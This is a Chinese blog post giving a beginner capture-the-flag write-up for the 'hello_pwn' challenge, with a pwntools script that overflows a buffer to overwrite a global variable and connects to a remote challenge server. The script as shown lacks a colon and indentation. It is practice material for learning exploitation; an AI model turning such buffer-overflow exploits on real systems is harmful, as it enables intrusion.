当前位置:网站首页>攻防世界新手入门hello_pwn
攻防世界新手入门hello_pwn
2022-06-28 12:07:00 【Day-3】

首先,我们先看一下文件。然后看一下它的保护。
没有什么防护。运行一下试试:
放入IDA中查看,
需要我们在unk_601068上填充数据,然后将dword_60106C地址中的内容覆盖为1853186401.
编写Python代码:
from pwn import *
context(os='Linux',arch="amd64",log_level="debug")
content = 1
def main()
if content == 1:
day3 = process("hello_pwn")
else:
day3 =remote("111.200.241.244",49744)
payload = b'a' * (0x6c - 0x68) + p64(1853186401)
day3.recvuntil("lets get helloworld for bof\n")
day3.sendline(payload)
day3.interactive()
main()
process和remote连接本地程序,也就是常说的打本地和打远程。
加b设为比特流,意为传送数据,p64打包,将数据打包成一个字节流。
得到Flag。
边栏推荐
- MapReduce project case 3 - temperature statistics
- If you want to change to software testing, how can you package your resume as a test engineer with 1 year of work experience
- 杰理之wif 干扰蓝牙【篇】
- 如何获取泛型的类型
- 运维思考 | 你知道CMDB与监控是什么关系吗?
- . Net hybrid development solution 24 webview2's superior advantages over cefsharp
- Pyqt5 visual development
- EMC RS485 interface EMC circuit design scheme
- Difference (one dimension)
- 多维度监控:智能监控的数据基础
猜你喜欢
![[C language] use of nested secondary pointer of structure](/img/59/8b61805431e152995c250f6dd08e29.png)
[C language] use of nested secondary pointer of structure

建立自己的网站(18)

ByteV搭建动态数字孪生网络安全平台----助力网络安全发展

What is the difference between internal oscillator, passive crystal oscillator and active crystal oscillator?

【C语言】判断三角形

Android应用安全之JNI混淆

Redis 原理 - List

ArrayList源码解析

websocket 1 分钟自动断开连接

KDD 2022 | 图“预训练、提示、微调”范式下的图神经网络泛化框架
随机推荐
CDC synchronization if the primary key of a database table changes, will it be synchronized into two data or will it be synchronized to update the primary key?
Levels – virtual engine scene production "suggestions collection"
【Unity编辑器扩展基础】、GUILayout
设置Canvas的 overrideSorting不生效
Software test interview classic + 1000 high-frequency real questions, and the hit rate of big companies is 80%
【Unity编辑器扩展实践】、查找所有引用该图片的预制体
Zero basic C language (I)
Self use demo of basic component integration of fluent
Daily practice of C language - day 4: find the sum of all even numbers within 100
Convert black mask picture to color annotation file
【经验分享】Django开发中常用到的数据库操作总结
【附源码+代码注释】误差状态卡尔曼滤波(error-state Kalman Filter),扩展卡尔曼滤波,实现GPS+IMU融合,EKF ESKF GPS+IMU
MapReduce project case 3 - temperature statistics
Two writing methods of JNI function
SEO优化的许多好处是与流量有直接关系
期货开户有门槛吗,如何网上安全的开通期货账户
[Beijing University of Aeronautics and Astronautics] information sharing for the first and second examinations of postgraduate entrance examination
websocket 1 分钟自动断开连接
Usage and principle of precomputedtextcompat
【vi/vim】基本使用及命令汇总